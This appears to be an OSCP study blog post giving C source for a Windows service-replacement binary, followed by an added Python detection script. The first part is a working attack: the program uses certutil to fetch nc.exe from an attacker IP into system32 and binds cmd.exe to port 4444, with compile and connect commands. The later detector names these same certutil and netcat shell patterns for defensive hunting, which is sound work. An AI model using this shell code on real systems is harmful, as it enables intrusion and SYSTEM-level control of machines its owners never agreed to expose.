Creating a Windows Bind Shell Using C
I’m studying for the OSCP and needed to replace the exe file of a Windows service with a new .exe file. On reboot, my goal is to have a shell as NT Authority/System.
Source Code
Filename: winshell.c
This file will:
- Use the native “certutil.exe” to download nc.exe.txt from the Kali box and save it as C:\windows\system32\nc.exe
- Create a listening socket on TCP 4444 (Windows machine)
#include <stdlib.h>
#include <windows.h>

int main(void)
{
    int i;

    /* Download nc.exe.txt from the Kali box with certutil and save it as nc.exe */
    i = system("certutil -urlcache -split -f http://192.168.119.152/nc.exe.txt c:\\windows\\system32\\nc.exe");
    Sleep(10000); // 10 seconds (10000 milliseconds)
    /* Start the listener on TCP 4444 */
    i = system("nc.exe -nlvp 4444 -e cmd.exe");
    return 0;
}
Compile winshell.c
sudo i686-w64-mingw32-gcc winshell.c -o winshell.exe
Connect to the Windows shell from the attacker box
nc -nv 192.168.152.10 4444
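Seen from the defender's side, the two commands winshell.exe runs leave recognizable process command lines. The following is an added example, not part of the original post: a small Python check over constructed process-creation records. The record layout, tag names, host names and sample command lines are assumptions made for illustration.

```python
import ntpath
import re

SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe"}
# Cluster of common netcat short flags that includes -l (listen), e.g. -l, -nlvp.
LISTEN_FLAGS = re.compile(r"-[klnpuvw]*l[klnpuvw]*")

EVENTS = [  # constructed samples, shaped like process-creation log fields
    {"host": "WS01", "cmdline": r"cmd.exe /c certutil -urlcache -split -f "
                                r"http://192.0.2.10/nc.exe.txt c:\windows\system32\nc.exe"},
    {"host": "WS01", "cmdline": "nc.exe -nlvp 4444 -e cmd.exe"},
    {"host": "WS02", "cmdline": r"certutil.exe -hashfile C:\Temp\setup.msi SHA256"},
    {"host": "WS03", "cmdline": r"certutil -urlcache -f https://example.org/root.crl c:\temp\root.crl"},
]

def classify(cmdline):
    """Return detection tags for one process command line."""
    toks = cmdline.lower().split()
    names = [ntpath.basename(t) for t in toks]
    urls = [i for i, t in enumerate(toks) if t.startswith(("http://", "https://"))]
    tags = []
    if ({"certutil", "certutil.exe"} & set(names)
            and {"-urlcache", "/urlcache"} & set(toks) and urls):
        tags.append("certutil-download")
        # Output path after the URL is an executable (e.g. .txt fetched, .exe saved).
        if any(t.endswith((".exe", ".dll")) for t in toks[urls[0] + 1:]):
            tags.append("saved-as-executable")
    # A listen flag plus "-e <shell>" means a shell is bound to a listening port.
    listens = any(LISTEN_FLAGS.fullmatch(t) for t in toks)
    for i, t in enumerate(toks[:-1]):
        if listens and t == "-e" and names[i + 1] in SHELLS:
            tags.append("listener-exec-shell")
    return tags

def hunt(events):
    """Collect tags per host; add a correlated tag when download and listener co-occur."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(classify(ev["cmdline"]))
    report = {}
    for host, tags in per_host.items():
        if {"certutil-download", "listener-exec-shell"} <= tags:
            tags.add("staged-bind-shell")
        if tags:
            report[host] = sorted(tags)
    return report

if __name__ == "__main__":
    for host, tags in hunt(EVENTS).items():
        print(host, tags)
```

WS03 shows why the download tag alone is a low-confidence signal: certutil also fetches CRLs and certificates legitimately, so the correlated tag on WS01 is the one worth alerting on.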